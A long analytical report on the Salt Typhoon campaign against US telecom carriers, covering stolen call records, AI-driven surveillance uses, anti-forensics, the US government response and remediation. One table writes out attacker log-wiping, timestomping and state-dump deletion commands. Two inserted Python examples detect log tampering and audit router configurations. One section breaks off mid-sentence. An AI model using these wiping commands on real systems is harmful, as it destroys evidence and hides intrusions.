By ingesting the call detail records (CDRs), geolocation logs, and internet traffic patterns of millions of Americans, the Ministry of State Security (MSS) has fed its AI systems the raw material needed to map the social and professional hierarchies of the United States for the coming decade. This operation marks a pivot from traditional espionage, which targets specific secrets, to “population-scale” surveillance, where the goal is to possess the entire haystack so that advanced algorithms can locate needles that human analysts do not yet know exist.

The Raw Material: What Was Stolen

To understand the AI threat, one must categorize the data Salt Typhoon extracted. Between 2023 and 2025, the group successfully compromised the internal systems of major telecommunications providers including Verizon, AT&T, and Lumen Technologies. The stolen data types were not random; they were selected for their utility in graph analysis and pattern recognition.

* **Call Detail Records (CDRs):** These logs show who spoke to whom, for how long, and at what time. They do not contain audio, but they reveal the structure of a target’s network.
* **Geolocation Metadata:** Cell tower triangulation data that tracks the physical movement of devices over months or years.
* **Lawful Intercept Requests:** Data revealing which phone numbers were under surveillance by U.S. law enforcement, exposing active FBI and DOJ investigations to the adversary.
* **Unencrypted Text Messages:** Content that provides semantic context to the metadata.

The AI Application: From Data to Intelligence

The sheer volume of this data, potentially involving billions of records, renders human analysis impossible. However, for the PRC’s state-aligned AI initiatives, this volume is an asset. FBI Director Christopher Wray warned in 2024 that China is using the “fruits of their widespread hacking to power, with AI, even more hacking efforts.”

The Salt Typhoon dataset allows for specific, high-value analytical processes that were previously theoretical.

**Pattern-of-Life Modeling**

Machine learning models can ingest geolocation and CDR data to establish a “baseline of normalcy” for millions of users. Once this baseline is set, the AI can autonomously flag anomalies. For example, if a device associated with a defense contractor suddenly begins traveling to a location associated with a divorce lawyer or a gambling addiction clinic, the system flags the individual as a potential recruitment target for blackmail. This process requires no human tasking; the algorithm simply hunts for leverage.

**The “Burner” Correlation**

Intelligence operatives and criminals frequently use “burner” phones to evade detection. AI analysis of Salt Typhoon data nullifies this tradecraft. By cross-referencing the geolocation of a known device (e.g., a diplomat’s personal phone) with the movement of unknown devices, an algorithm can identify “co-travelers.” If Phone A and Phone B sleep at the same address and move in tandem for three days, the AI links the burner identity to the diplomat with near-perfect accuracy.

**Mapping the Shadow Network**

Perhaps the most damaging application is the reconstruction of covert networks. By analyzing the CDRs of known U.S. intelligence officers (identified through the OPM hack or other breaches), Chinese AI can traverse the “degrees of separation.” If an officer calls a seemingly random number, and that number calls three others, the AI builds a graph of the officer’s potential sources or assets. This “contact chaining” can unmask undercover operatives who have never been directly compromised but who communicated with someone who was.

The Time-Machine Effect

The danger of this dataset is not limited to the present. Metadata is static; the fact that Person A called Person B on January 12, 2025, never changes. This permanence allows the MSS to perform retrospective analysis. In 2028, if a junior congressional staffer rises to a position of high clearance, Chinese intelligence services can query the Salt Typhoon dataset from 2024. They instantly know who that staffer was dating, where they spent their weekends, and who they communicated with before they had a security clearance. The data serves as a “time machine,” allowing the adversary to investigate a target’s past long after the initial breach has been patched.

Comparative Analysis Capabilities

The following table illustrates the gap between traditional human intelligence analysis and the AI-driven capabilities enabled by the Salt Typhoon dataset.

Table: Human vs. AI Analysis of Telecommunications Metadata

| Operational Metric | Human Analyst Capability | AI/ML Capability (PRC State-Level) |
|---|---|---|
| Processing Volume | Can review ~100 records per day. | Can process billions of records per hour. |
| Relationship Mapping | Identifies direct contacts (1st degree). | Identifies complex networks (Nth degree) and hidden clusters. |
| Anomaly Detection | Requires specific trigger or tip-off. | Autonomous, continuous scanning for deviation from baseline. |
| Co-Traveler Identification | Labor-intensive manual correlation. | Instant automated matching of device movements globally. |
| Retention Utility | Data value degrades as memory fades. | Data value increases as models improve and new analytical techniques emerge. |

Strategic

The integration of Salt Typhoon data into China’s AI ecosystem represents a permanent shift in the counter-intelligence balance. The CISA and FBI joint advisories in 2025 emphasized that this is not a temporary breach but a “long-term strategic advantage” for the adversary. The theft of wiretap data, in particular, allows the MSS to train its models on *how* the U.S. government conducts investigations, enabling them to predict and evade future American surveillance efforts.

By feeding American telecommunications data into their large language models and graph neural networks, the PRC has created a digital mirror of U.S. society. This mirror allows them to simulate social pressures, predict the movement of key personnel, and identify vulnerabilities in the American human terrain with a precision that was previously the domain of science fiction.

Operational Security: Forensic Anti-Forensics and Log Wiping

Salt Typhoon operates with a level of forensic paranoia that distinguishes it from financially motivated cybercriminal groups. Unlike ransomware gangs that announce their presence through encryption notices, this state-sponsored entity prioritizes “zero-trace” persistence. Their operational security (OpSec) doctrine relies on aggressive anti-forensic techniques designed to destroy evidence of residency, blinding incident response teams and extending dwell times.

Analysis of intrusions between 2020 and 2025 reveals a systematic approach to log sterilization, timestamp manipulation, and kernel-level obfuscation that has allowed the group to maintain access for periods exceeding nine months in high-value government networks.

The group’s most potent anti-forensic capability is the Demodex rootkit, a kernel-mode implant deployed on Windows servers. Demodex is engineered specifically to conceal the actor’s footprint from the operating system itself. It intercepts system calls to hide malicious files, registry keys, and network traffic from security products and forensic tools.

To bypass Windows Driver Signature Enforcement (DSE), a security feature designed to prevent unsigned drivers from loading into the kernel, Salt Typhoon uses a signed driver from the open-source “Cheat Engine” project. This “bring your own vulnerable driver” (BYOVD) technique allows them to manipulate kernel memory and load the unsigned Demodex rootkit without triggering alerts, rendering their presence invisible to standard endpoint detection and response (EDR) agents.

On network infrastructure, particularly Cisco routers and Linux-based appliances, Salt Typhoon executes precise command sequences to sanitize logs. Forensic analysis of compromised telecommunications equipment has recovered script fragments used to surgically remove incriminating entries rather than deleting entire log files, which would raise suspicion.

For instance, operators have been observed using the sed stream editor to delete specific lines containing keywords like “segfault” or specific IP addresses from debug logs, leaving the rest of the file intact. In other instances, they employ the dmesg -C command to clear the kernel ring buffer, wiping evidence of hardware-level interactions or crash dumps that could betray their activities.

The group also weaponizes the “Guest Shell” feature on Cisco IOS XE devices. After using this containerized Linux environment to run reconnaissance tools or move laterally, operators execute the guestshell disable command. This action not only stops the container but also wipes the temporary file system associated with it, destroying tools and command histories resident within the shell. This ephemeral execution model leaves little to no forensic residue on the device’s persistent storage, complicating post-incident attribution.

Timestomping, the alteration of file timestamps, is another core component of their anti-forensic toolkit. Salt Typhoon operators frequently modify the $STANDARD_INFORMATION attribute of malicious files to match the creation dates of legitimate system files (e.g., calc.exe or ntdll.dll). This technique places malicious artifacts outside the time windows scrutinized by forensic analysts during a triage. PowerShell commands are frequently used to automate this process, ensuring that dropped web shells or backdoors blend directly into the target’s file system chronology.

| Technique / Tool | Target Environment | Forensic Impact | Observed Command / Method |
|---|---|---|---|
| Demodex Rootkit | Windows Servers | Hides files, processes, registry keys, and network connections from OS and EDR. | Kernel-mode hooking via BYOVD (Cheat Engine driver). |
| Log Injection/Deletion | Linux / Unix | Surgically removes specific error logs or trace entries. | `sed -i '/segfault/d' debuglog; dmesg -C` |
| Container Wiping | Cisco IOS XE | Destroys file system and history of guest container. | `guestshell disable` |
| Timestomping | Windows / NTFS | Backdates file attributes to match legitimate system files. | `(Get-Item file).CreationTime = '1/8/2019'` |
| State Dump Deletion | Network Appliances | Removes crash dumps that contain memory artifacts. | `rm -rf /data/var/statedumps/*` |
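The sed -i and dmesg -C entries in the table above share one property a defender can use: a surgical edit changes a log file in ways an append-only log never does. The following is an added example, not code from the article or from any vendor tool, that baselines a log file and reports the artifacts such a rewrite leaves behind: a new inode (GNU sed -i writes a temporary file and renames it over the original), a shrinking file, an altered prefix, and a gap in per-line sequence numbers. The sample log lines, the sequence-number line format and the temporary paths are constructed for the example.

```python
"""Detect surgical log edits of the kind described in the table above.

Added example, not from the article. It assumes an append-only text log
whose lines begin with a monotonically increasing sequence number; the
sample lines, that line format and the temporary paths are constructed.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass


@dataclass
class LogBaseline:
    inode: int          # identity of the file at baseline time
    size: int           # bytes present at baseline time
    prefix_sha256: str  # hash of exactly those bytes


def _seq_of(line: str) -> int:
    # Constructed line format: "<seq> <timestamp> <message>"
    return int(line.split(" ", 1)[0])


def take_baseline(path: str) -> LogBaseline:
    """Record inode, size and content hash of a log that is trusted right now."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        data = fh.read()
    return LogBaseline(st.st_ino, st.st_size, hashlib.sha256(data).hexdigest())


def check_log(path: str, base: LogBaseline) -> list:
    """Return a list of findings; an untouched or append-only log yields []."""
    findings = []
    st = os.stat(path)
    with open(path, "rb") as fh:
        data = fh.read()
    if st.st_ino != base.inode:
        # GNU sed -i writes a temporary file and renames it over the original,
        # so an in-place edit shows up as a brand-new inode.
        findings.append("inode changed: file was replaced rather than appended to")
    if st.st_size < base.size:
        findings.append("file shrank: entries removed or file truncated")
    if hashlib.sha256(data[: base.size]).hexdigest() != base.prefix_sha256:
        findings.append("baseline prefix altered: existing entries were edited")
    expected = 1
    for line in data.decode("utf-8").splitlines():
        seq = _seq_of(line)
        if seq != expected:
            findings.append(f"sequence gap: expected {expected}, got {seq}")
        expected = seq + 1
    return findings


def simulate_sed_i_deletion(path: str, keyword: str) -> None:
    """Mimic `sed -i '/keyword/d' path`: rewrite without the matching lines,
    then rename the new file over the old one (this is what sed -i does)."""
    with open(path, "r", encoding="utf-8") as fh:
        kept = [l for l in fh.read().splitlines() if keyword not in l]
    tmp = path + ".sedtmp"
    with open(tmp, "w", encoding="utf-8") as fh:
        fh.write("".join(line + "\n" for line in kept))
    os.replace(tmp, path)


def demo():
    """Baseline a constructed log, tamper with it, and return both check results."""
    path = os.path.join(tempfile.mkdtemp(), "debuglog")
    sample = [  # constructed sample log lines, not from any real system
        "1 2025-03-01T10:00:00Z kernel: boot complete",
        "2 2025-03-01T10:00:05Z sshd: session opened for user admin",
        "3 2025-03-01T10:00:09Z kernel: segfault at 0 ip 00007f3a in unknown.so",
        "4 2025-03-01T10:00:12Z sshd: session closed for user admin",
    ]
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("".join(line + "\n" for line in sample))
    base = take_baseline(path)
    before = check_log(path, base)             # [] : nothing has changed yet
    simulate_sed_i_deletion(path, "segfault")  # remove the incriminating line
    after = check_log(path, base)
    return before, after


if __name__ == "__main__":
    for finding in demo()[1]:
        print(finding)
```

Two design points matter in practice. The baseline must be stored somewhere the device's root account cannot reach (a remote collector), otherwise an operator who can run sed -i can also refresh the baseline. And a cleared kernel ring buffer cannot be reconstructed from the device, so the counterpart to this check for dmesg -C is forwarding kernel messages off-box as they are emitted rather than inspecting the buffer afterwards.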

The efficacy of these measures is clear in the dwell time metrics associated with Salt Typhoon intrusions. In a confirmed breach of a U.S. Army National Guard network, the group maintained access from March through December 2024, a period of nine months, before detection. This extended residency allowed for the exfiltration of critical network configuration files and administrator credentials. The delay in detection was directly attributed to the group’s discipline in cleaning up “state dumps” and obfuscating their lateral movement through the network’s own administrative pathways.

The FBI Response: The $10 Million Bounty and Task Force

The Federal Bureau of Investigation (FBI) escalated its counter-espionage operations against the Salt Typhoon group in 2025, abandoning traditional containment strategies for an aggressive, public-facing offensive. Recognizing that the People’s Republic of China (PRC) had state-sponsored actors deep within the telecommunications backbone of the United States, the Bureau deployed its most significant financial weapon: the Department of State’s Rewards for Justice (RFJ) program.

On April 29, 2025, the FBI and the State Department announced a reward of up to $10 million for information leading to the identification or location of any person who, while acting at the direction of a foreign government, participates in malicious cyber activities against U.S. critical infrastructure. While the RFJ program has long targeted terror financing, this specific bounty was calibrated to fracture the operational security of the Ministry of State Security (MSS) and its network of contractors. The announcement explicitly sought actionable intelligence on individuals associated with Sichuan Juxinhe Network Technology Co., Ltd., a front company identified by Treasury officials as a primary logistical node for Salt Typhoon operations.

Brett Leatherman, Assistant Director of the FBI’s Cyber Division, characterized the bounty as a necessary tool to pierce the “veil of anonymity” protecting MSS contractors. “We are not just looking for IP addresses,” Leatherman stated during a press briefing at the RSA Conference in San Francisco. “We are looking for the names, travel patterns, and financial accounts of the specific operators who believe they can target American infrastructure with impunity.”

Interagency Task Force and H.R. 9769

Parallel to the financial offensive, the legislative and executive branches moved to formalize the interagency response. Following the introduction of H.R. 9769, known as the Strengthening Cyber Resilience Against State-Sponsored Threats Act, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) established a dedicated interagency task force. This body was not a consultative group but an operational unit mandated to “prioritize and coordinate U.S. government efforts” to evict Salt Typhoon actors from domestic networks.

The task force operated under a “hunt-forward” directive, deploying teams to major telecommunications providers, including AT&T, Verizon, and Lumen, to conduct forensic eradications. Unlike previous voluntary partnerships, the task force leveraged new authorities to demand real-time data sharing from victimized entities. By August 2025, this unit had identified Salt Typhoon activity in over 600 organizations across 80 countries, confirming that the campaign was a global prepositioning effort rather than espionage.

| Date | Action | Target / Entity | Impact |
|---|---|---|---|
| Dec 10, 2024 | Legislative Action | H.R. 9769 Passage | Mandated creation of the FBI-CISA interagency task force. |
| Jan 17, 2025 | Treasury Sanctions | Sichuan Juxinhe Network Technology; Yin Kecheng | Blocked assets and exposed MSS contractor links. |
| Apr 29, 2025 | RFJ Bounty Offer | Salt Typhoon Individuals | $10 million reward for identification of operators. |
| Aug 27, 2025 | Joint Advisory | Global Telecom Sector | Released technical signatures for detection in 80+ nations. |

Sanctions and Attribution

The FBI’s investigation provided the evidentiary basis for the Department of the Treasury’s Office of Foreign Assets Control (OFAC) to impose sanctions. On January 17, 2025, OFAC sanctioned Sichuan Juxinhe Network Technology Co., Ltd. and a Chinese national, Yin Kecheng, for their direct roles in the campaign. The sanctions froze all U.S. assets held by these entities and prohibited American firms from conducting business with them.

This attribution was significant because it pierced the corporate veil frequently used by Chinese intelligence services. Sichuan Juxinhe was not a rogue criminal enterprise but a legitimate-looking technology firm in Chengdu that provided “cyber-related products and services” to the MSS. The FBI’s forensic analysis revealed that Yin Kecheng and his associates had developed specific tools to exploit Cisco IOS XE vulnerabilities, allowing them to intercept “lawful intercept” data, the very systems used by U.S. law enforcement for court-ordered wiretaps.

The task force also coordinated with international partners, including the United Kingdom’s National Cyber Security Centre (NCSC) and the Australian Signals Directorate (ASD). In August 2025, this coalition released a joint advisory that detailed the “living-off-the-land” techniques used by Salt Typhoon, such as modifying router configurations to route traffic through GRE tunnels. This technical exposure forced the MSS to abandon several compromised nodes, temporarily disrupting their ability to exfiltrate data from the nine primary U.S. victim companies.

Despite these successes, FBI officials remained cautious. In a July 2025 interview, Leatherman noted that while the threat was “largely contained” within known victim networks, the actors remained “dormant” rather than fully eradicated. The $10 million bounty remains active, a standing offer to any insider within the Chinese technical community to trade state secrets for a new life in the West.

Geopolitical: Escalation in US-China Cyber Relations

The exposure of the Salt Typhoon campaign has precipitated a sharp and dangerous escalation in Sino-American relations, transforming a chronic cybersecurity irritant into a central pillar of geopolitical confrontation. Unlike previous incidents involving intellectual property theft or ransomware, the Salt Typhoon operation, specifically its compromise of “lawful intercept” systems, was interpreted by Washington not as espionage, but as a direct assault on the sovereign legal authority of the United States. The breach has triggered a cascade of sanctions, diplomatic expulsions, and retaliatory rhetoric that has frozen bilateral cooperation on digital security.

In January 2025, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) formally sanctioned Sichuan Juxinhe Network Technology Co. Ltd. and a Chinese national, Yin Kecheng, citing irrefutable evidence of their role in the Salt Typhoon infrastructure. This marked a significant departure from the “name and shame” indictments of the past; these were direct economic strikes against entities integrated into China’s Ministry of State Security (MSS) supply chain. The sanctions severed these entities from the global financial system, a move that Beijing immediately decried as “illegal unilateral jurisdiction.”

Diplomatic Retaliation and the “Hacking Empire” Narrative

The diplomatic response from the People’s Republic of China was swift and coordinated. In a press conference following the sanctions, Ministry of Foreign Affairs spokesperson Mao Ning rejected the attribution entirely, characterizing the U.S. evidence as “fabricated disinformation” designed to justify technological containment. Beijing pivoted to a counter-narrative, labeling the United States the world’s “Hacking Empire.” This rhetoric was amplified by Chinese state media, which recirculated

Remediation Reality: The Technical Difficulty of ‘Burn Down’ Eviction

The eviction of Salt Typhoon from compromised telecommunications infrastructure represents a technical challenge that transcends standard incident response. Unlike ransomware actors who encrypt files and demand payment, Salt Typhoon operatives embed themselves into the very firmware of network edge devices, specifically Cisco routers and switches that form the backbone of global data transit. Security professionals and federal agencies have increasingly acknowledged that traditional “patch and reboot” methodologies are insufficient. Instead, the industry faces the grim reality of a “burn down” scenario: the need to physically replace hardware or conduct total, bare-metal reimaging of critical infrastructure to guarantee the adversary’s removal.

This persistence is driven by the group’s ability to exploit zero-day vulnerabilities in network operating systems, most notably Cisco IOS XE. By leveraging defects such as CVE-2023-20198 and CVE-2023-20273, Salt Typhoon actors gain root-level privileges that allow them to rewrite the device’s operating code. Once this “implant” is established, the adversary controls the boot process itself. A standard firmware update applied by a network administrator may report success while the malicious code remains active in the background, surviving reboots and factory resets. CISA and the FBI have warned that without forensic verification of the hardware’s integrity, a process that frequently requires taking the device offline and shipping it to a lab, operators cannot be certain the threat is neutralized.

The Mechanics of Deep Persistence

Salt Typhoon’s tradecraft relies on “living off the land” techniques that turn legitimate network administration tools into weapons of espionage. Once inside a router, they frequently configure Generic Routing Encapsulation (GRE) tunnels. These tunnels create covert, encrypted communication channels that bypass standard firewalls, allowing traffic to flow directly to command-and-control (C2) servers under the guise of normal network routing. Also, investigators have found modified Access Control Lists (ACLs) hidden deep within device configurations, frequently named innocuously (e.g., “access-list 20”), which silently permit unauthorized traffic from specific IP ranges associated with Chinese intelligence infrastructure.
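Because these changes live in the device configuration rather than on an endpoint, the practical check is to audit the running-config text against what the operator has actually approved. The block below is an added example (not from the article, from Cisco, or from any advisory) that parses a constructed `show running-config` excerpt, flags tunnel interfaces whose destination is not on an approved peer list, and flags standard access-list entries that permit sources outside approved ranges. One caveat a practitioner should keep in mind: GRE itself provides encapsulation, not encryption, so the indicator to hunt for is the tunnel's existence and its destination rather than anything about its payload. The allow-lists, interface names and IP ranges are assumptions constructed for the example.

```python
"""Audit an IOS XE running-config for unapproved tunnels and ACL sources.

Added example, not from the article or from Cisco. The config excerpt,
the allow-lists and every IP address below are constructed for illustration.
"""
import ipaddress
import re

# Constructed `show running-config` excerpt (documentation address ranges only).
SAMPLE_CONFIG = """\
!
interface GigabitEthernet0/0/0
 ip address 203.0.113.10 255.255.255.0
!
interface Tunnel7
 description mgmt-backup
 ip address 10.99.99.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 198.51.100.77
 tunnel mode gre ip
!
access-list 10 permit 10.0.0.0 0.255.255.255
access-list 20 permit 198.51.100.0 0.0.0.255
access-list 20 permit host 192.0.2.9
!
line vty 0 4
 access-class 10 in
!
"""

# Operator-maintained allow-lists (assumptions for this example).
APPROVED_TUNNEL_PEERS = {"10.0.0.2"}
APPROVED_SOURCES = [ipaddress.ip_network("10.0.0.0/8")]

ACL_RE = re.compile(r"^access-list (\S+) permit (.+)$")


def wildcard_to_network(addr, wildcard):
    """IOS wildcard masks set 'don't care' bits to 1, so the netmask is the complement."""
    mask = (~int(ipaddress.IPv4Address(wildcard))) & 0xFFFFFFFF
    prefix = bin(mask).count("1")
    if mask != (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF:
        raise ValueError(f"non-contiguous wildcard {wildcard}")
    return ipaddress.ip_network(f"{addr}/{prefix}", strict=False)


def parse_blocks(config_text):
    """Group indented lines under their unindented parent line, in order."""
    blocks = []
    for raw in config_text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" ") and blocks:
            blocks[-1][1].append(raw.strip())
        else:
            blocks.append((raw.strip(), []))
    return blocks


def acl_source_network(args):
    """Parse the source part of a standard numbered ACL entry."""
    tokens = args.split()
    if tokens[0] == "any":
        return ipaddress.ip_network("0.0.0.0/0")
    if tokens[0] == "host":
        return ipaddress.ip_network(f"{tokens[1]}/32")
    wildcard = tokens[1] if len(tokens) > 1 else "0.0.0.0"
    return wildcard_to_network(tokens[0], wildcard)


def audit_config(config_text, approved_peers=APPROVED_TUNNEL_PEERS,
                 approved_sources=APPROVED_SOURCES):
    """Return human-readable findings for tunnels and ACL sources not on the allow-lists."""
    findings = []
    for header, body in parse_blocks(config_text):
        if header.startswith("interface Tunnel"):
            dest = next((l.split()[-1] for l in body if l.startswith("tunnel destination")), "unset")
            # GRE over IP is the IOS default, so a missing 'tunnel mode' line still means GRE.
            mode = next((l for l in body if l.startswith("tunnel mode")), "tunnel mode gre ip (default)")
            if dest not in approved_peers:
                findings.append(f"{header}: {mode}, destination {dest} not in approved peer list")
            continue
        m = ACL_RE.match(header)
        if m:
            try:
                net = acl_source_network(m.group(2))
            except ValueError:
                # Extended ACL syntax (protocol, ports) is out of scope here; surface it for review.
                findings.append(f"access-list {m.group(1)}: unparsed entry, review manually: {header}")
                continue
            if not any(net.subnet_of(a) for a in approved_sources):
                findings.append(f"access-list {m.group(1)} permits {net}, outside approved source ranges")
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

Run this over configurations pulled out-of-band on a schedule and compared with a golden copy, not over a config the device itself reports on request; an operator with the access the article describes can shape what an interactive `show running-config` returns, but a diff against a known-good archive still exposes any tunnel or access-list entry that appeared without a change ticket.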

The following table contrasts standard remediation efforts with the extreme measures required to dislodge Salt Typhoon:

| Remediation Step | Standard Cyber Threat | Salt Typhoon (State-Sponsored) |
|---|---|---|
| Detection | Antivirus/EDR alerts on endpoints. | Behavioral analysis of router traffic; no EDR exists for routers. |
| Containment | Isolate infected machine from network. | Impossible to isolate core routers without cutting ISP service. |
| Eradication | Reformat hard drive and reinstall OS. | “Burn Down”: Physical hardware replacement or JTAG flashing. |
| Verification | Scan for malware signatures. | Memory forensics required; persistence frequently survives updates. |
| Cost | Low (software re-image). | Extreme (hardware replacement at carrier scale). |

The Logistical Impossibility of Scale

The “burn down” approach hits a wall when applied to the scale of a Tier-1 telecommunications provider. A major ISP may operate tens of thousands of edge routers and core switches. Replacing this hardware is not only a financial burden, estimated in the billions of dollars, but a logistical impossibility within a short timeframe. Supply chains for high-end networking gear frequently have lead times of 6 to 12 months. Consequently, carriers are forced into a perilous middle ground: attempting to sanitize infected devices while knowing that a single missed implant allows the adversary to re-infect the entire sanitized segment immediately.

“We cannot say with certainty that the adversary has been evicted, because we still don’t know the scope of what they’re doing. I have confidence that we are on top of it… we cannot, with confidence, say that we know everything.”

Jeff Greene, Executive Assistant Director for Cybersecurity, CISA (December 2024)

This uncertainty has led to a “zombie network” phenomenon where operators must assume their infrastructure remains compromised even after remediation cycles. In late 2024 and throughout 2025, reports surfaced of Salt Typhoon re-appearing in networks that had been declared clean weeks prior. The group’s use of GhostSpider malware and lateral movement through valid administrative credentials means they can hide in the noise of legitimate traffic, waiting for the remediation teams to stand down before reactivating their access.

Ultimately, the technical difficulty of eviction forces a shift in strategy from “prevention” to “resilience.” If the hardware cannot be trusted, the data traversing it must be secured independently. This reality has accelerated the adoption of Zero Trust Architecture and pervasive encryption, assuming that the transport itself is hostile territory controlled by foreign intelligence services.

Strategic Pre-Positioning: Espionage vs. Potential Sabotage

The distinction between active espionage and the preparation for future sabotage is frequently a matter of intent rather than capability. In the case of Salt Typhoon, the depth of access achieved within the United States telecommunications infrastructure suggests a dual-purpose campaign. While the primary observed activity between 2023 and 2025 has been the theft of sensitive call records and the monitoring of specific targets, federal intelligence agencies assess that these same footholds constitute a strategic “pre-positioning” of assets. This placement allows the People’s Republic of China (PRC) to potentially disrupt or sever critical communications during a future kinetic conflict.

Security researchers and government officials have long differentiated between threat actors who steal data and those who prepare to destroy systems. Salt Typhoon blurs this line. By compromising the core routing infrastructure and Lawful Interception (LI) systems of major providers like AT&T, Verizon, and Lumen Technologies, the group has secured a vantage point that offers total visibility into network traffic. This level of control is functionally identical to the access required to execute a “kill switch” scenario, where traffic could be selectively dropped, rerouted, or blocked entirely.

The Dual-Use Nature of Backbone Access

The specific technical achievements of Salt Typhoon reveal why the sabotage threat is considered credible by the FBI and CISA. The group did not infect endpoints; they compromised Cisco IOS XE devices and the systems used for CALEA (Communications Assistance for Law Enforcement Act) compliance. These systems are designed to be privileged, stable, and unhindered by standard firewalls to ensure law enforcement can execute court-ordered wiretaps.

Accessing these systems for espionage allows the actor to listen to calls and read texts. However, the same administrative privileges allow for the reconfiguration of routing tables. In a sabotage scenario, an attacker with this access could corrupt the routing logic that directs data packets across the internet backbone. A coordinated execution of such commands across multiple compromised providers would result in a catastrophic loss of connectivity for civilian and military users alike, isolating large geographic regions from the national grid.

In February 2024, CISA, the NSA, and the FBI released a joint advisory warning that PRC state-sponsored actors were “pre-positioning” themselves on IT networks for disruptive attacks. While this warning heavily referenced Volt Typhoon’s focus on energy and water sectors, later assessments in late 2024 clarified that Salt Typhoon’s hold on the telecommunications sector serves as the nervous system for this broader strategy. Without reliable communications, the coordination required to remediate attacks on power or water plants becomes nearly impossible.

Operational Indicators: Intelligence Collection vs. Latent Destruction

Analyzing the forensic footprint of Salt Typhoon helps distinguish between their current operations and their potential future capabilities. The following table outlines how specific compromised assets serve both immediate intelligence goals and latent destructive potential.

Table 25.1: Salt Typhoon Asset Utilization: Espionage vs. Sabotage Capabilities

| Compromised Asset | Current Espionage Function | Latent Sabotage Potential |
|---|---|---|
| Lawful Interception (LI) Systems | Real-time monitoring of voice/text; tracking subjects of US warrants. | Deletion of warrant data; disruption of FBI/police surveillance; fabrication of evidence. |
| Cisco IOS XE Routers | Port mirroring to copy traffic for exfiltration; mapping network topology. | “Blackholing” traffic (dropping packets); severing connections between key data centers. |
| User Authentication Databases | Credential harvesting to access cloud environments and email servers. | Mass lockout of legitimate administrators; deletion of user profiles to prevent recovery. |
| Network Management Systems | Silent observation of network health to avoid detection. | Falsifying monitoring data to hide outages; disabling alarms during a kinetic attack. |

The “Hold at Risk” Strategy

The strategic logic behind this pre-positioning is known as “holding critical infrastructure at risk.” By maintaining deep, persistent access, Beijing creates a deterrent against U.S. action in the Indo-Pacific. If a conflict were to erupt over Taiwan, the PRC could use Salt Typhoon’s access to induce panic and paralysis within the United States homeland. The psychological impact of a sudden, unexplained failure of cellular and internet services would be immediate, potentially delaying military mobilization and decision-making.

In December 2024, reports surfaced that Salt Typhoon had extended its reach beyond commercial providers to the networks of the Army National Guard in at least one state. This lateral movement from ISP backbones into military-adjacent networks signals a shift from pure foreign intelligence collection to operational preparation. The theft of network maps and administrative credentials from these entities provides the blueprints necessary to disable them. FBI officials noted in early 2025 that the group’s operations were “still very much ongoing,” implying that even with public exposure, the actors retained functional access to key nodes.

The difficulty in countering this threat lies in the legitimate nature of the tools abused. Salt Typhoon frequently uses “living off the land” techniques, employing standard administrative commands to move through networks. Distinguishing between a systems administrator updating a route and a Salt Typhoon operative preparing a blackout requires behavioral analysis that legacy telecom systems are not equipped to perform. Until these architectures are modernized to enforce Zero Trust principles, the infrastructure remains primed for potential disruption.

Conclusion: The Permanent Shift in Sovereign Network Defense

The exposure of the Salt Typhoon campaign in late 2024 did not merely reveal a vulnerability in United States telecommunications infrastructure. It shattered the foundational assumption that domestic carrier networks are trusted environments. By penetrating the Lawful Intercept systems, the very architecture designed for court-authorized wiretaps, the actors attributed to the Ministry of State Security (MSS) demonstrated that the “backbone” of American connectivity is contested territory. The subsequent fallout through 2025 has forced a permanent alteration in how sovereign nations conceive of network defense.

Federal agencies have moved from a posture of perimeter defense to one of “presumed compromise.” In December 2024, the FBI and CISA took the extraordinary step of recommending that government officials and corporate executives switch to encrypted messaging applications for sensitive communications. This guidance admitted that the standard cellular voice and SMS provided by major carriers like AT&T and Verizon could no longer be secured against state-level adversaries. The era of the “clean pipe” is over. Organizations must operate as if the transport itself is hostile.

The political and regulatory response in 2025 amplified this fragmentation. While the Biden administration initially attempted to mandate strict cybersecurity certifications for telecom providers in January 2025, the political transition led to a sharp reversal. In November 2025, the Federal Communications Commission (FCC) voted 2-1 to rescind these mandatory cybersecurity rules, favoring a voluntary cooperation model. This deregulation occurred even as Senator Mark Warner confirmed in December 2025 that intelligence agencies still offered “conflicting assessments” on whether Salt Typhoon actors had been fully evicted from U.S. networks. The disbanding of the Cyber Safety Review Board (CSRB) in January 2025 further decentralized the response, leaving individual agencies and corporations to fund and manage their own defense overlays.

The operational impact of this shift is visible in the new “Sovereign Overlay” doctrine adopted by critical infrastructure sectors. Defense is no longer about hardening the ISP’s routers, as those are outside the customer’s control. Instead, defense focuses on cryptographic isolation of data before it touches the carrier network. The breach of a U.S. state’s Army National Guard network, revealed in a July 2025 DHS memo to have lasted nine months, proved that reliance on perimeter security allows adversaries to dwell for extended periods. The response has been a decoupling of sensitive traffic from the underlying transport infrastructure.

Table 26.1: The Shift in Sovereign Network Defense Doctrine (2024-2026)

| Defense Component | Pre-Salt Typhoon Doctrine (Legacy) | Post-Salt Typhoon Doctrine (Current) |
| --- | --- | --- |
| Trust Model | Implicit trust in Tier 1 carriers (ISPs). | Zero Trust; ISP networks treated as “untrusted/hostile.” |
| Communication Security | Reliance on cellular standards (4G/5G/SMS). | Mandatory over-the-top (OTT) encryption. |
| Lawful Intercept (CALEA) | Viewed as a law enforcement tool. | Viewed as a high-risk attack surface for foreign espionage. |
| Hardware Supply Chain | Focus on banning specific vendors (e.g., Huawei). | Focus on “living off the land” attacks on approved gear (Cisco/Juniper). |
| Remediation Strategy | Patch and reboot. | Hardware replacement and firmware forensic auditing. |

The financial costs of this shift are substantial. Telecommunications providers face the dual burden of ripping out compromised legacy hardware while managing the reputational damage of the breach. For the United States government, the cost is strategic. The Salt Typhoon campaign demonstrated that the People’s Republic of China could access the metadata of presidential campaigns and the content of unencrypted calls. This capability acts as a potent asymmetric weapon. It forces the U.S. to spend billions on overlay encryption and secure hardware while the adversary exploits vulnerabilities in decades-old protocols like Signaling System 7 (SS7) and the complexities of BGP routing.

Salt Typhoon proved that the digital borders of the United States are porous. The response has not been to seal the border, which is technically impossible in a globalized internet, but to armor the convoys moving through it. Sovereign network defense relies on the assumption that the adversary is already inside the wire. The objective is no longer total prevention of access. The objective is the preservation of command and control even with that access.


About The Author
Headline Row